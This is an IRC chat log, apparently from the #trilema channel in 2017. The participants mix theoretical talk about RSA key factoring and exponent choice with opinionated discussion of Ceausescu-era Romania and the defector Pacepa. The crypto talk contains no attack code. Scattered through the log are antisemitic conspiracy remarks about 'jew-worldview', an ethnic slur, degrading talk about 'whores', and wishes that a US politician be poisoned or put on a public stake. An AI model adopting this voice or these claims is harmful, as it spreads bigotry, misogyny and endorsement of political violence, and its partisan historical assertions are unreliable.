1737702;1510672222;mircea_popescu;http://btcbase.org/log/2014-05-10#669753 1737703;1510672222;a111;Logged on 2014-05-10 20:40 mircea_popescu: fluffypony that's right, this is the channel of the minority of people into bitcoin that aren't also pedos. 1737704;1510672537;mircea_popescu;http://btcbase.org/log/2017-11-14#1737600 << oh, i see now what you were talking about. right5 you are, yes, i was focused on the edges not the middle. 1737705;1510672537;a111;Logged on 2017-11-14 14:33 asciilifeform: observe, you cannot say anything re p,q from he middle bits of pq (or rsa would be useless) 1737706;1510672590;mircea_popescu;http://btcbase.org/log/2017-11-14#1737624 << afaik, ~continuous~, which is a significantly higher bar 1737707;1510672590;a111;Logged on 2017-11-14 14:40 asciilifeform: iirc most recent black magic gives you polynomialtime breakage if >=.22b of bitness b of p or q bits are known 1737708;1510672634;mircea_popescu;(ordered but not continuous a lesser bar ; known-positions higher but still lesser ; continuous block, unknown position ; etc) 1737709;1510672637;asciilifeform;gotta be continuous, or i could 'mahaha, i know mircea_popescu's q has 1024 ones!' 1737710;1510672647;mircea_popescu;hey. 1737711;1510672653;mircea_popescu;thats a knowledge, "exactly 1024 ones" 1737712;1510672665;asciilifeform;within 1sd or so lel 1737713;1510672681;mircea_popescu;let teh enemy fight with the army it has! 1737714;1510672701;asciilifeform;1024 is ten bits of info, readily brutable 1737715;1510672713;asciilifeform;so sheer weight of 1s can't be much use 1737716;1510672717;asciilifeform;if rsa is strong 1737717;1510672736;mircea_popescu;how useful something is is of no consequence in the classification of things. it still gets a label. 1737718;1510672758;asciilifeform;anyway original observation was re upper and lower cont. strings 1737719;1510672775;mircea_popescu;also, polynomial time isn't THAT great. depends a little on the polynomial involved :D 1737720;1510672776;asciilifeform;afaik no published work re known middles 1737721;1510672780;asciilifeform;sure. 1737722;1510672794;asciilifeform;( recall the primalitytest thread ) 1737723;1510672808;mircea_popescu;the meet in the middle etc thing i saw was far from instantaneous. maybe better technologies do exist, but anwyay 1737724;1510672832;mircea_popescu;"doable", yes, but nobody's writing a php script of this to put on his site. 1737725;1510672902;mircea_popescu;(then again this dun say much -- phuctor, "undoable" until it was done, according to the idle wankers / "academics" publishing around it pretending to not know where they got their dataz.) 1737726;1510672913;deedbot;mircea_popescu: http://p.bvulpes.com/pastes/hiFyl/?raw=true 1737727;1510672968;asciilifeform;veritable feast for the vultures, it's been lately 1737728;1510672989;asciilifeform;i stopped keeping track in real time. 1737729;1510672998;asciilifeform;czechs, germans, etc boecks. 1737730;1510673126;asciilifeform;depressing reading. 'suddenly dud rsa keys, hip!' 1737731;1510673355;mircea_popescu;whole "civilisation" of folk hoping to pass off some tech with serials shaved off. 1737732;1510673390;mircea_popescu;the necessary corelate of "no kid left behind" and "creativity!!11", after all. where's all the world's mediocrities to come up with shit ? 1737733;1510673415;asciilifeform;there was a '90s american film where there is a scene, where an airplane lands in africa and in fast motion gets stripped for parts, like elephant carcass by hyenas 1737734;1510673416;mircea_popescu;copy/paste wikipedia exams are a matter of necessity if you're going to bother all shepherds and whatnot daylabourers to join your "college" 1737735;1510673425;asciilifeform;but there at least they dun pretend to have created the airplane. 1737736;1510673428;mircea_popescu;asciilifeform there's been films of elephant etc same. 1737737;1510673442;mircea_popescu;of course they do! the saving grace is that you don't speak orc, to see the pretense. 1737738;1510673453;mircea_popescu;petrus pretends to have created england ; so do romanians at that 1737739;1510673480;asciilifeform;i thought in ro cosmography england was an uninteresting backwater. or is that only mircea_popescu 1737740;1510673490;mircea_popescu;are you aware there's a substantial ro mystico-scientism putting the etruscans as romanian derivative ? and no, it's not "ceausescu madness", ro sufragette cca 1920, exact equiv of that russian fat old woman. 1737741;1510673497;mircea_popescu;asciilifeform 100% mp. 1737742;1510673513;asciilifeform;i'm not esp surprised re etruscans item 1737743;1510673519;asciilifeform;considering the venerable ancient ukrs. 1737744;1510673609;asciilifeform;( re ro crackpottery, asciilifeform is 2/3 through pacepa's tome , and marvels over the d00d's complete omission of how ~he himself~ came to be loyal servant of 'worst ever cruellest evil emperor' ) 1737745;1510673801;asciilifeform;or take the 'it was really the demented witch' narrative. invites the q, why did nobody have for her any poison ? really, none of the flunkies ? 1737746;1510674326;mircea_popescu;imagine, he was a general. before that, colonel. earlier still, major. prior to that, lt. 1737747;1510674328;mircea_popescu;and so on. 1737748;1510674709;asciilifeform;aha, and somehow reader is expected to believe that d00d 'always hated communism' etc 1737749;1510674713;mircea_popescu;motherfucker, the coffee in this country. HOW do they do it. 1737750;1510674732;asciilifeform;( this is universal crack in 'dissident runaway' autobios ) 1737751;1510674752;mircea_popescu;asciilifeform amusingly, ion iliescu went through similar period. "dissident" etc. except for the pics where he's playing retarded games with ceausescu & co. 1737752;1510674763;asciilifeform;ah lol the ro eltsin 1737753;1510674777;mircea_popescu;ye 1737754;1510674847;mircea_popescu;and you know, pacepa was no less than ro resident in rfg. he fucking led the east presence there for at least most of 64. 1737755;1510674883;mircea_popescu;then he got promoted in 66 (ceausescu came to teh secretariatship in 65). 1737756;1510674959;asciilifeform;it wouldn't surprise asciilifeform to learn that d00d lives not far . 1737757;1510674969;mircea_popescu;afaik he does. 1737758;1510674976;mircea_popescu;maryland something. 1737759;1510674990;asciilifeform;i'd expect he dun take the trains tho. 1737760;1510674998;asciilifeform;( in his place i wouldn't ) 1737761;1510675033;mircea_popescu;i dunno... at some point in the 80s the whole eastern front (arafat, gaddafi, ceausescu) had multi-mn bounties on his head. if he survived that... 1737762;1510675043;mircea_popescu;market value of 88yo is ~0 anyway. 1737763;1510675122;mircea_popescu;(amusingly, the unsupportable and otherwise batshit insane ugc in http://trilema.com/2011/procesul-ceausescu/ is ~100% unsourced copy/pastes from the dude's "red horizons" booklet) 1737764;1510675215;mircea_popescu;and in other lulz : usg focused on infiltrating and corrupting ro justice system first ; as a result in 1999 they came up with a "rehabilitation" supreme court decision. ro govt refused to recognize it, which resulted in a lot of usg agitprop material as to how "romania not yet rule of law". 1737765;1510675238;mircea_popescu;kinda the blue state blueprint, in general. first subvert justice system then lie about rule of law then so following. 1737766;1510675337;mircea_popescu;(amusingly, one of the dudes that somehow "failed to identify" pacepa went on to kill a coupla french spies in sudan) 1737767;1510676240;BingoBoingo;Question: What is a bank reference letter? 1737768;1510676259;mircea_popescu;(to ruin many "westerners" hopes and delusions of self relevancy : http://btcbase.org/log/2017-11-14#1737754 means that no, paris '68 is NOT necessarily more than the original later copied by obama-socialism under heading of "orange revolutions". "oh, you mean pacepa's paris v2.0 ? I SEE!.") 1737769;1510676259;a111;Logged on 2017-11-14 15:54 mircea_popescu: and you know, pacepa was no less than ro resident in rfg. he fucking led the east presence there for at least most of 64. 1737770;1510676331;asciilifeform;http://btcbase.org/log/2017-11-14#1737763 << this is unashamedly printed on the jacket of the present-day edition, even 1737771;1510676331;a111;Logged on 2017-11-14 15:58 mircea_popescu: (amusingly, the unsupportable and otherwise batshit insane ugc in http://trilema.com/2011/procesul-ceausescu/ is ~100% unsourced copy/pastes from the dude's "red horizons" booklet) 1737772;1510676335;asciilifeform;( at least the american one ) 1737773;1510676503;asciilifeform;re the shoemaker, asciilifeform still can't fully shake the traditional ru version , where man was plugged for paying off his national debt, rather than 'the beoble Finally Had Enuff!' usgolade nonsense. 1737774;1510676799;mats;https://www.bloomberg.com/news/articles/2017-11-14/venezuela-s-bondholder-meeting-is-a-bust-as-s-p-declares-default 1737775;1510677985;asciilifeform;http://btcbase.org/log/2017-11-14#1737762 << the nazi-hunters, it would seem , disagreed with this. 100 y.o. d00d could still, hypothetically, know where he buried the gold etc 1737776;1510677985;a111;Logged on 2017-11-14 15:57 mircea_popescu: market value of 88yo is ~0 anyway. 1737777;1510678199;mircea_popescu;BingoBoingo generally the lowest rank of the letters of credit. the bank makes a non binding judgement as to customer;s ability to meet a specirfied financial obligation. 1737778;1510678210;mircea_popescu;this is spurious in your case, tell them you'll pay cash upfront. 1737779;1510678244;mircea_popescu;asciilifeform lol! 1737780;1510678282;mircea_popescu;asciilifeform the people true and squarely had enough. this is the fundamental problem with being saddled with a people in the first place -- what they want isn't ever what';s needed. 1737781;1510678295;asciilifeform;thebeoble have always 'had enuff' 1737782;1510678300;asciilifeform;but e.g. obummer still alive. 1737783;1510678303;asciilifeform;and gorby. 1737784;1510678366;mircea_popescu;"the people have had enough with not being able to buy consumer goods ; and if they were able to buy consumer goods they'd have wanted to "form oppinions" in the manner of ustards, and in the vein of "school exams too hard ; work too long hours ; idealised self not actualised by regime ; let other people take our industry, we'll do service "industry" ; want to live today on money we might make tomorrow IF and only if we don't 1737785;1510678366;mircea_popescu; get it today" 1737786;1510678369;BingoBoingo;mircea_popescu: ty, I'll tell this lawyer being auditioned. I'll also ask him if he can do BROU instead of fucking Santander. 1737787;1510678377;mircea_popescu;and in that vein, once one starts one doesn't end until california reconstructed. 1737788;1510678400;mircea_popescu;BingoBoingo lmao wtf is a lawyer herping about such nonsense. 1737789;1510678492;BingoBoingo;mircea_popescu: I asked him for the "how do we get a corporation fast" answer. His answer is off the shelf. This isn't the first time I've heard "bank reference" being bandied aboutwith respect to opening a corporate account. 1737790;1510678532;*;mircea_popescu shrugs. 1737791;1510678542;*;BingoBoingo continues asking 1737792;1510678635;BingoBoingo;asciilifeform: re: http://btcbase.org/log/2017-11-14#1737472 which of the three items were you discussing when you mentioned "boobytrapped", any suggested remedies or alternatives? 1737793;1510678635;a111;Logged on 2017-11-14 05:01 asciilifeform: BingoBoingo: default firmware is known-boobytrapped 1737794;1510678673;asciilifeform;BingoBoingo: i dun have anything against the 'octeon' per se ironwise. just be sure to build own os for it. 1737795;1510678684;asciilifeform;( it's a straightforward bsd target, for instance ) 1737796;1510678731;asciilifeform;for only slightly higher cost you get those amd g-series boxen ( e.g. 'pcengines' ) 1737797;1510678736;asciilifeform;approx same physical dimensions 1737798;1510678746;BingoBoingo;Ah 1737799;1510678768;asciilifeform;what are you making, BingoBoingo , the exit router ? 1737800;1510678773;BingoBoingo;Well, this router is the beefier Octeon box. 1737801;1510678783;BingoBoingo;asciilifeform: Thing to manage routes 1737802;1510678790;asciilifeform;there's no particular reason to insist that the ~router~ have >2 jacks 1737803;1510678804;asciilifeform;multiplying jacks is what the switch is for 1737804;1510678805;BingoBoingo;Room to grow by trunking lines 1737805;1510678833;BingoBoingo;Also room to cross connect in the future. 1737806;1510678873;asciilifeform;if you have 2, each can be turned into as many as you want, with ordinary iron switches. 1737807;1510678891;asciilifeform;sorta why ethernet is a net, not a point-to-point port 1737808;1510678904;asciilifeform;( really a bus ) 1737809;1510678942;mircea_popescu;asciilifeform anyway, it's not simply " paying off his national debt". it's like this : dood went deeply into debt post nixon visit, on the strength of us jewish promises (ie, tech transfer) and to the degree of their own established "deep enough to have no way out". they obviously did not deliver, but then he DID dig himself out, paid whole debt in little over decade. ie, not only that he paid it, but that he paid it "imposs 1737810;1510678942;mircea_popescu;ibly" ie "does not understand how jew-worldview works!" 1737811;1510678956;asciilifeform;aha! 1737812;1510678966;asciilifeform;so 'had problems'. with the murder weapon being 'uprising' 1737813;1510678979;mircea_popescu;and then in SPITE of "tech control", romania was building its own computers. not good, no. yet. but it's own machine gun factory WAS better than us anything, after a 20-30 years of "not good, no". 1737814;1510679007;asciilifeform;even pacepa's b00k describes a ~working~ pilfered vlsi lab 1737815;1510679011;mircea_popescu;and then in spite of "political control" ie "containment policy" romania operated it's OWN gulf concessions with its own machinery and shipped the oil on its own boats made in its own factories. 1737816;1510679018;mircea_popescu;fuck you empire of a complete size. 1737817;1510679023;asciilifeform;i.e. for all i know shoemaker & co were about to start making ivories 1737818;1510679041;mircea_popescu;but, no, ceausescu didn't get overthrown because "the people". who the fuck seriously thinks "the people" even matter, jesus. 1737819;1510679045;mircea_popescu;the problem is he had no successor. 1737820;1510679057;asciilifeform;same problem as stalin 1737821;1510679060;mircea_popescu;asciilifeform possibly by 1995 yes. 1737822;1510679064;mircea_popescu;re ivories. 1737823;1510679065;asciilifeform;complete with prodigal son etc 1737824;1510679069;mircea_popescu;quite, yes. 1737825;1510679073;asciilifeform;( nicu is exactly vasiliy ) 1737826;1510679114;mircea_popescu;anyway, if he HAD a continuator, like the chinese managed to continue xiaoping, i have little doubt i'd be all for the regime, decked in the usual "youngest general in the signals" regalia and we'd be holding this convo across the berlin wall. 1737827;1510679155;asciilifeform;hey i'm all for the regime right nao!111 1737828;1510679172;asciilifeform;the hat man's, that is 1737829;1510679186;mircea_popescu;meh. it'd have had to be reformed. half of it made no sense. 1737830;1510679204;*;asciilifeform nao even has that selfsame hat. walks in to visit family, they immediately : 'brezhnev!' 1737831;1510679210;mircea_popescu;socialist-nationalism still socialism. make it capitalist nationalism we're in business. specifically - the portuguese business, rape everyone 1737832;1510679226;asciilifeform;good half of just about anything, dug up by archaeologists, similarly makesnosense 1737833;1510679240;mircea_popescu;i was there, dun need archeologists. 1737834;1510679244;mircea_popescu;this is a major diff. 1737835;1510679302;asciilifeform;well similarly asciilifeform was there for gorby 1737836;1510679310;asciilifeform;( though did not live as long as mircea_popescu ) 1737837;1510679317;mircea_popescu;this is not similar, i was there for ceausescu not for iliescu lol 1737838;1510679359;asciilifeform;asciilifeform's elder brother did however witness 'golden age' . 1737839;1510679392;mircea_popescu;so then, elder brother saying "half of it made no sense" very != archeologist saying "i don't understand how half of this shit even worked" 1737840;1510679392;asciilifeform;and never quite stopped rubbing it in . 'hey that loaf of bread you ate in timis ? we had these, and cost 3 kopeiki' etc 1737841;1510679402;asciilifeform;yea 1737842;1510679404;mircea_popescu;i understand how it worked ; it however made no sense. diff point. 1737843;1510679420;mircea_popescu;asciilifeform he had a point, at that. 20 to the ruble im sure. 1737844;1510679431;asciilifeform;i regret to report that even after 25yr of usaschwitz it still makesnosense. 1737845;1510679444;asciilifeform;mircea_popescu: in every case he had a point. 1737846;1510679567;mircea_popescu;of particular interest to you might be causescu's self-concept, especially items such as "a critica" (to critique). i dunno how many of his own words you've read, but the man had a very interesting (on the grounds of its incredible low level form that maintained reasonable function) husserl approach to post-hegelian dialectics. 1737847;1510679592;asciilifeform;got reading recs for subj ? 1737848;1510679603;mircea_popescu;this, in a fellow entirely unsuspectable of having ever HEARD of husserl, let alone read anything in german, is a feat somewhat comparable to the 256 byte 99% lisp interpreter. 1737849;1510679613;asciilifeform;i'd enjoy eating. once i get past '5th grade' level of rotaku. 1737850;1510679626;mircea_popescu;asciilifeform marginally sufficient material (to show it, if not to discover it necessarily) actually on trilema. 1737851;1510679648;asciilifeform;but where 1737852;1510679649;mircea_popescu;nah, his romanian was that of a retard, 5th grade just about. very evidently SIMPLE alphabet. 1737853;1510679651;mircea_popescu;lessee. 1737854;1510679714;asciilifeform;'я русский бы выучил. только за то,. что им. разговаривал Ленин' (tm)(r)(mayakovsky) 1737855;1510679746;asciilifeform;(src, http://wotpaste.cascadianhacker.com/pastes/N2TRJ/?raw=true ) 1737856;1510679859;asciilifeform;mircea_popescu: d00d did know ru tho. so could have, in theory, read the german thinkers, neh 1737857;1510679868;mircea_popescu;neh. 1737858;1510679875;mircea_popescu;dood had trouble reading newspaper. 1737859;1510679880;mircea_popescu;entirely oral thinker. 1737860;1510679956;mircea_popescu;dood also had serious emotivity probloems -- extremely shy, etcetera. epicycle is perhaps that encounter with the czechoslovak "labour people" when they ask him a (simple, let's be friends) question (context is that he's the hero, against soviet invasion, etc) and he totally can't answer. 1737861;1510679961;mircea_popescu;you seen that ? 1737862;1510680016;asciilifeform;yea visible from the surviving material readily 1737863;1510680044;asciilifeform;( or even consider the famous last balcony scene ) 1737864;1510680089;mircea_popescu;in THAT context some confusion is expected. 1737865;1510680109;mircea_popescu;but to be unable to say who you're thanking at oscar ceremony... kinda blonde moment. you KNEW they were gonna ask. 1737866;1510680125;asciilifeform;troo. 1737867;1510680134;asciilifeform;that's a 'did he do his homework' moment. 1737868;1510680150;mircea_popescu;except he didn't comprehend there's a homework to do. 1737869;1510680178;mircea_popescu;and to most mediocre people, gave this impression of utter idiocy, because regularily contradicted their "reasonable expectations". except didn't have the mp refinement of making it painful for them later. 1737870;1510680189;mircea_popescu;so the notion endured, "oh, mp doesn't understand maffs". 1737871;1510680204;asciilifeform;dunno, supposedly he did make it somewhat painful for some of'em later 1737872;1510680205;mircea_popescu;it's true, he doesn't. NEITHER DO YOU. without that latter part... 1737873;1510680224;mircea_popescu;asciilifeform nope. the problem with the mediocre pretending to "intellectuals" is they've agreed to only hurt physcologically. 1737874;1510680306;asciilifeform;i was thinking of the 'i hereby order mr.pantsuit caught and fed some radium' instances. 1737875;1510680385;mircea_popescu;yes, but those "don't count" 1737876;1510680401;mircea_popescu;it has to be "mrs pantsuit, where's your having won the presidency nao ?" at the lowest. 1737877;1510680416;BingoBoingo; entirely oral thinker. << Ah, hung out with too many Frenchies did he 1737878;1510680421;mircea_popescu;ideally, it's a "hey, check out how your stupidity #1 contradicts your stupidity #2, what do you have to say for your stupidity that isn't throwing a hissy fit ?" 1737879;1510680448;asciilifeform;mebbe this shows that asciilifeform is same sort of peasant as the shoemaker, but finding it hard to see why not counts. having pantsuit hoisted on a public stake would even moar count imho 1737880;1510680450;mircea_popescu;BingoBoingo hung with ~nobody. didn't even fuck around, married a 25yo whore 9-year whore, stuck to her 50 years. 1737881;1510680454;asciilifeform;why does it have to be a paper humiliation. 1737882;1510680461;asciilifeform;what's wrong with meat humiliation. 1737883;1510680469;mircea_popescu;asciilifeform cuz that's what the mediocre intellect has decided upon. 1737884;1510680491;asciilifeform;maybe ants also have complicated requirements for how to humiliate. but ! ddt still worx! 1737885;1510680500;mircea_popescu;not according to the ant. 1737886;1510680510;mircea_popescu;see, this is the problem : selection and education are different. 1737887;1510680524;mircea_popescu;yes i select my whores. but once i selected what may be promises, i humiliate her, i don't fucking kill her. 1737888;1510680532;mircea_popescu;humiliation is definitionally "in the terms of the idiot" 1737889;1510680557;asciilifeform;this makes sense 1737890;1510680663;mircea_popescu;may be promising* 1737891;1510680916;mircea_popescu;dude it's incredible how fucking useless the internet is. 1737892;1510680935;asciilifeform;ikr ? 1737893;1510680961;asciilifeform;i found last yr, somewhat surprisingly, that the works of stalin are not sitting in plain txt anywhere 1737894;1510680972;mircea_popescu;you know ? 1737895;1510681026;mircea_popescu;i read piles of ceausescu transcripts, they're all exactly nowhere. 1968 meeting with the writer's union ? really, NOT EVEN THAT ? 1965 may 19th "who wants a seat in helicopter" one ? nope ? 1737896;1510681034;mircea_popescu;it's like... dude forget it, 0%. 1737897;1510681090;asciilifeform;when asciilifeform wanted to read lysenko in the original , he had to visit the rarest-rarities reading room in american national lib of medicine 1737898;1510681103;asciilifeform;nowhere else, was subj preserved ( outside of possibly similar archive in moscow, possibly ) 1737899;1510681121;mircea_popescu;nuts. 1737900;1510681133;asciilifeform;but hey you can download winblowz 10 at 25MB/sec !11111 1737901;1510681138;asciilifeform;and lolcatz 1737902;1510681387;mircea_popescu;im totally finding this, motherfucker, im sure i saved copies on trilema somehwere PRECISELY for this conversation 1737903;1510681419;BingoBoingo;!!Up hubud 1737904;1510681419;deedbot;hubud voiced for 30 minutes. 1737905;1510681442;mircea_popescu;asciilifeform http://trilema.com/2013/what-is-art/#comment-96132 << ceausescu on art. 1737906;1510681531;mircea_popescu;http://p.bvulpes.com/pastes/EQGx2/?raw=true << full item 1737907;1510681548;asciilifeform;oh neato 1737908;1510681562;mircea_popescu;after a stenograph of 1971 (aug 4) meeting at Mangalia (Neptun). 1737909;1510681579;mircea_popescu;the 1965 and 1968 items absent, but pars pro toto this shall have to do. 1737910;1510681671;mircea_popescu;dude has the audacity to ask for "a ballet on the topic of having finished the kolohoz-isation". you know ? at least asks the right fucking questions, even if nobody in audience has the mettle to make answer. 1737911;1510681734;mircea_popescu;and he has the numbers : right here, where we happen to be, i ~know the name of the local lord~, and his numbers : 600 to 2209, he says. and what is teh retort ? 1737912;1510681843;mircea_popescu;"oh the numbers are wrong". yeah, im sure they are. and the tractors invented, and the working the fields with oxen and horses and wives pre 1940 calumny, perhaps. hurr. 1737913;1510682379;davout;http://btcbase.org/log/2017-11-14#1737789 <<< needed the same when opening a bank account in .mu, reference letter didn't need any particular judgement about whether i'd be able to meet a financial committment, but just something along the lines of "had bizns with this gentleman for X years, didn't leave with unpaid debts, isn't a fucking gypsy" 1737914;1510682379;a111;Logged on 2017-11-14 16:54 BingoBoingo: mircea_popescu: I asked him for the "how do we get a corporation fast" answer. His answer is off the shelf. This isn't the first time I've heard "bank reference" being bandied aboutwith respect to opening a corporate account. 1737915;1510682414;davout;http://btcbase.org/log/2017-11-14#1737688 <<< ty, will read 1737916;1510682414;a111;Logged on 2017-11-14 15:09 mircea_popescu: davout re pedo discussion : http://btcbase.org/log/2017-06-30#1677971 ; http://btcbase.org/log/2017-05-07#1652534 ; http://btcbase.org/log/2017-05-03#1651425 ; http://btcbase.org/log/2017-02-21#1616334 ; http://btcbase.org/log/2015-04-30#1116819 ; http://btcbase.org/log/2015-03-06#1043675 ; http://btcbase.org/log/2015-02-24#1032677 ; http://btcbase.org/log/2015-02-24#1032676 ; as well as period lulz such as http://btcbase.org 1737917;1510682445;davout;http://btcbase.org/log/2017-11-14#1737733 <<< "lord of war" iirc 1737918;1510682445;a111;Logged on 2017-11-14 15:30 asciilifeform: there was a '90s american film where there is a scene, where an airplane lands in africa and in fast motion gets stripped for parts, like elephant carcass by hyenas 1737919;1510683817;BingoBoingo;In other news, apparently Tower 4 of the world trade center is not actually inside the world trade center free zone. 1737920;1510684513;mircea_popescu;http://btcbase.org/log/2017-11-14#1737917 < o right! not a bad film, at that. 1737921;1510684513;a111;Logged on 2017-11-14 18:00 davout: http://btcbase.org/log/2017-11-14#1737733 <<< "lord of war" iirc 1737922;1510684556;mircea_popescu;mmm 2005. no, there was some 1970s item 1737923;1510685435;phf;http://btcbase.org/log/2017-11-14#1737529 << that doesn't sound right, read and eval are distinct phases, by the time you get to eval you shouldn't be operating with strings when but instead with interned symbols (i.e. things that can be eq'd in lisp and pointer equivalent on c machine level) 1737924;1510685435;a111;Logged on 2017-11-14 11:25 spyked: http://btcbase.org/log/2017-11-13#1737264 <-- strings are (lisp) lists-of-characters. which, as it is, unfortunately makes parsing and evaluating builtin functions (e.g. cons, car, cdr) a pain in the ass. can be structured cleanly though. also, this makes it not a simple matter of find+replace in shithub scheme.adb. 1737925;1510685485;deedbot;http://trilema.com/2017/il-merlo-maschio/ << Trilema - Il merlo maschio 1737926;1510685639;phf;for example your Symbol_EqualP should just be a pointer comparison, rather than string comparison. (the whole point of a ~symbol~ over a string is that it's interned, i.e. same sequence of characters always map to the identical Symbol object) 1737927;1510685662;apeloyee;http://btcbase.org/log/2017-11-14#1737542 << that's just DoS. but, if you have computational capacity, you check the padding. may also require that it's signed with my key, with the pubexp attached if you don't know it. Thus, the modulus is in principle sufficient to _initiate_ the converstaion 1737928;1510685662;a111;Logged on 2017-11-14 14:12 asciilifeform: http://btcbase.org/log/2017-11-14#1737520 << what keeps a million enemies from offering false pubexps in false conversations, preventing us from agreeing on a genuine one ? 1737929;1510685710;asciilifeform;apeloyee: by same argument, '1 bit of the modulus is sufficient to init conversation, after it we'll agree on next bit' etc 1737930;1510685726;apeloyee;I don't see how you can extend to this case 1737931;1510685744;asciilifeform;in either case, in practice enemy can drown you 1737932;1510685783;apeloyee;well, that means the enemy can drown you even if we kave pub.exps, by simply flooding 1737933;1510685787;apeloyee;*have 1737934;1510685803;apeloyee;with random garbage 1737935;1510685817;asciilifeform;not if i have '9000' entry points to my gossip net, each of which rejects malformed rsa packets in O(1) at line speed 1737936;1510685856;apeloyee;u can use these to verify that purported pub-exp is validly signed 1737937;1510685876;asciilifeform;right, but to do it, you first have to receive proposed exp 'on faith' at that endpoint 1737938;1510685901;asciilifeform;the amount of computation that you must do, and bits you must buffer, to do friend-or-foe, is considerably larger. 1737939;1510685920;mircea_popescu;apeloyee signature also relies on knowing your exp 1737940;1510685961;apeloyee;can attach your pubexp in plaintext, to the signature 1737941;1510685983;mircea_popescu;but a signature signed by a pubexp i didn't have PRIOR to the receiving of the signature is definitionally worthless. 1737942;1510685994;mircea_popescu;as it communicates nothing above "3+3 = 6" 1737943;1510686027;apeloyee;I thought you said modulus _is_ the identity, and here I presume the modulus is known 1737944;1510686038;mircea_popescu;dang i said pubexp i meant pubkey. 1737945;1510686052;asciilifeform;mircea_popescu: apeloyee was extending the http://btcbase.org/log/2017-11-08#1734664 argument, as i understand 1737946;1510686052;a111;Logged on 2017-11-08 23:10 asciilifeform: returning to the exponent thing, seems that mircea_popescu is right, nothing particularly interesting can be done by distributing a pub with e' . ( other than 'believe me , his e is 3' and then messages ~to that pub~ are breakable if padding is broken. but that' sit . ) 1737947;1510686057;asciilifeform;that modulus -- suffices for identity 1737948;1510686066;mircea_popescu;so your model is, i have your pubkey, and encounter an item signed by that N, with a specific e that's included in the signed text ? 1737949;1510686078;apeloyee;yes 1737950;1510686089;apeloyee;of course, must check that e/=1 1737951;1510686090;mircea_popescu;aha. yes, this is exactly what we do not 1737952;1510686092;mircea_popescu;now* 1737953;1510686096;asciilifeform;this in fact worx. but makes for heavy sigs. 1737954;1510686101;mircea_popescu;except we're currently defaulting e's no whatever, 65537 1737955;1510686113;mircea_popescu;for exactly asciilifeform 's reason : shorter this way 1737956;1510686185;jurov;a111: strings are sequences, not lists. cons/car/cdr does not apply, there's different set of functions for these 1737957;1510686195;asciilifeform;the 'everyone has same e' thing was slipped in under clinton , when his nsa invested in 'acre of asics' with e=3|e=65537 presumption baked in 1737958;1510686213;mircea_popescu;in other domestic tranquility news, just finished stuffing a mason jar with baked peppers. they have some FABULOUS kapja peppers here. 1737959;1510686227;apeloyee;the amount of computation that you must do ,<< the same as for any packet: 1 mod-exp and check padding. >> and bits you must buffer, to do friend-or-foe, is considerably larger. << twice as much. might be acceptable, depending on circumstances. 1737960;1510686249;asciilifeform;apeloyee: it makes , e.g., udp (512byte) impossible. 1737961;1510686281;mircea_popescu;and i just appointed a new crown provider of chocolate. you should see this thing, so endearingly evidently hand-made copy of "how a chocolate looks" when hershey makes it... 1737962;1510686294;asciilifeform;the sad thing is that ( at least until we get, e.g., the shortwave net, going ) there are some boxes of fixed size, that in practice gotta be sat down into if at all possible 1737963;1510686300;mircea_popescu;anyway, if anyone wants some chocolate/coffee/whatever mp-approved products shipped lemme know ima send you a batch. 1737964;1510686300;asciilifeform;and one of these is the unfragged ip packet. 1737965;1510686310;asciilifeform;oh neato 1737966;1510686334;*;asciilifeform would rather pick up in person, when he finally gets around to visiting mircea_popesculandia 1737967;1510686343;mircea_popescu;also works. 1737968;1510686434;asciilifeform;apeloyee: sorta why i suggested making pub-exp nextprime(keccak(commentstring)). satisfies the basic req of e being 1) long 2) nonstandardized 1737969;1510686453;mircea_popescu;stop providing support of "utility" for nextprime 1737970;1510686458;mircea_popescu;it is an anti-useful non-feature. 1737971;1510686464;asciilifeform;it dun matter if it leaks, for a public constant neh 1737972;1510686482;mircea_popescu;there are some primitives you don't wanrt to keep around, 1737973;1510686486;mircea_popescu;exactly like rat eggs. 1737974;1510686505;asciilifeform;'where is next prime' is perfectly legit wrench in any respectable numeric toolbox, wat 1737975;1510686509;mircea_popescu;"but mp, rats don't reproduce by eggs" "And why do you have to thank for that ?" 1737976;1510686514;asciilifeform;lol 1737977;1510686521;mircea_popescu;who* 1737978;1510686528;asciilifeform;reminds asciilifeform of his brother's 'from old flat, you brought mouse spores !!' 1737979;1510686534;mircea_popescu;heh 1737980;1510686568;mircea_popescu;enlighten me, what does this wrench perfectly legitimately ever do ? 1737981;1510686582;apeloyee;(512byte) << already impossible if must be both encrypted and signed 1737982;1510686586;asciilifeform;making nonseekrit primes quickly, say 1737983;1510686589;apeloyee;with rsa 1737984;1510686595;asciilifeform;apeloyee: with 4096b rsa troo 1737985;1510686601;asciilifeform;one or the other, per packet 1737986;1510686604;mircea_popescu;apeloyee there is no such thing in tmsr rsa. 1737987;1510686609;mircea_popescu;EITHER encrypted OR signed. 1737988;1510686831;mircea_popescu;asciilifeform there's much faster ways, such as the 2^x - y method. 1737989;1510686840;asciilifeform;waiwat 1737990;1510686862;asciilifeform;that doesn't auto-map a n-bit integer to an n-bit prime. 1737991;1510686868;asciilifeform;in n-bit ffa arithm. 1737992;1510686871;mircea_popescu;it precisely does. 1737993;1510686879;asciilifeform;let's hear now ? 1737994;1510686886;mircea_popescu;if you want an n bit prime calculate 2^n and substract the correct small integer. 1737995;1510686897;mircea_popescu;2^300 - 153 eg 1737996;1510686912;asciilifeform;i don't want ~an~ n-bit prime, i want THE n-bit prime corresponding to arbitrary n-bit input I. 1737997;1510686913;mircea_popescu;or w/e, 2^400 - 593 1737998;1510686921;asciilifeform;repeatably. 1737999;1510686924;mircea_popescu;there is no such correspondence. there's more n than log n 1738000;1510686928;asciilifeform;well not 1:1 1738001;1510686933;asciilifeform;naturally 1738002;1510686939;asciilifeform;but 'same input, same output' 1738003;1510686939;mircea_popescu;well then stfu and read alf's haranguing re hashes. 1738004;1510686954;asciilifeform;call it hash, yes, that outputs a prime. 1738005;1510686974;asciilifeform;( nothing to stop you from imposing other types of hash in between, incidentally . as i did in the pubexp example ) 1738006;1510686984;asciilifeform;it suffers from all of the limitations of other hashes. 1738007;1510687001;mircea_popescu;nevertheless, the correct solution to this "quickly, prime this many bits long" is a n, k tuple which contains n as the bitsize and k as the "oddness". if you want the n - 396 k = 5 prime you get 2^396- 1229 1738008;1510687005;mircea_popescu;ie, the 5th prime down. 1738009;1510687056;asciilifeform;you get a handful of primes this way, before the arithmetic becomes unwieldy 1738010;1510687061;asciilifeform;( and definitely not ffatronic ) 1738011;1510687093;mircea_popescu;we're still not clear on "The needs this wrench helps". so far very much blender-toilet. "maybe someone somewhere needs to make turd batidos" 1738012;1510687100;asciilifeform;at any rate, prime-constructor ( see apeloyee's thread re subj ) is entirely 